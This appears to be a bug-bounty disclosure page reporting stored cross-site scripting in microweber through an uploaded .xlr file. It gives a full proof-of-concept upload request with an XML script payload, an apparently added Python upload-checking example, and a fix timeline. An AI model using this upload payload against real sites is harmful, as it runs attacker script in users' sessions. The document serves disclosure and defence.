Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber


Reported on Jul 2nd 2022


In the file upload function, the server allows uploading a .xlr file that contains JavaScript code, which leads to stored XSS.

Proof of Concept


POST /demo/plupload HTTP/1.1
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="chunk"

Content-Disposition: form-data; name="chunks"

Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
        <a:script xmlns:a="">alert(window.origin)</a:script>


HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129


PoC Image



This vulnerability allows arbitrary JavaScript to execute in the origin of the site, which can be used to perform HTTP requests, CSRF, read the content of same-origin pages, etc.
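The fix referenced in the timeline below (Files.php) is not reproduced on this page. As an added example that is not microweber's code, the check below shows one way a server-side upload handler can catch this class of file: decide by content rather than by extension, and serve stored uploads with headers that stop the browser from rendering them inline. The extension allowlist and the .xlr sample are assumptions; the sample body is a constructed copy of the PoC payload above.

```python
import re

# Assumed allowlist for this example. ".xlr" is included because the report
# says the endpoint accepted it; the content check decides whether the bytes
# are actually safe to store under that extension.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "csv", "xls", "xlr"}

# Leading bytes that a browser's sniffer or an XML parser treats as markup.
# Checked after optional BOM and whitespace, which is how real sniffing works.
_MARKUP_START = re.compile(
    rb"^\s*(?:\xef\xbb\xbf)?\s*<(?:\?xml|!doctype|html|svg|script|[a-z0-9]+:script)", re.I
)
# A <script> element with or without a namespace prefix (the PoC uses <a:script>).
_SCRIPT_TAG = re.compile(rb"<(?:[a-z0-9_.\-]+:)?script[\s>]", re.I)


def check_upload(filename: str, data: bytes) -> dict:
    """Return a verdict for an uploaded file: rejected with a reason, or
    accepted together with the headers it must be served with later."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return {"ok": False, "reason": f"extension '{ext}' not allowed"}
    head = data[:4096]
    # None of the allowed extensions is a document type, so bytes that start
    # like XML/HTML or contain a script element are the report's case: reject.
    if _MARKUP_START.match(head) or _SCRIPT_TAG.search(head):
        return {"ok": False, "reason": f"markup/script content under extension '{ext}'"}
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    headers = {
        # Never let the browser second-guess the declared type.
        "X-Content-Type-Options": "nosniff",
        # Force download so the file is never rendered as a same-origin document.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
    }
    return {"ok": True, "headers": headers}


# Constructed copy of the PoC body from the report (namespace value left empty as shown).
POC_XLR = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'        <a:script xmlns:a="">alert(window.origin)</a:script>\n'
)

if __name__ == "__main__":
    print(check_upload("poc.xlr", POC_XLR))
    print(check_upload("report.xlr", b"\x00\x01 constructed binary spreadsheet bytes"))
```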

We are processing your report and will contact the microweber team within 24 hours. (a month ago)
Nhien.IT modified the report (a month ago)
Nhien.IT modified the report (a month ago)
We have contacted a member of the microweber team and are waiting to hear back (a month ago)
Peter Ivanov modified the Severity from Medium to Low (a month ago)
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability (a month ago)
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 39797c (a month ago)
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
Peter Ivanov (a month ago)

Thanks for the report. In order to upload the .xlr file you need to be logged in as admin.

a month ago

Yah! Thank you, sir!
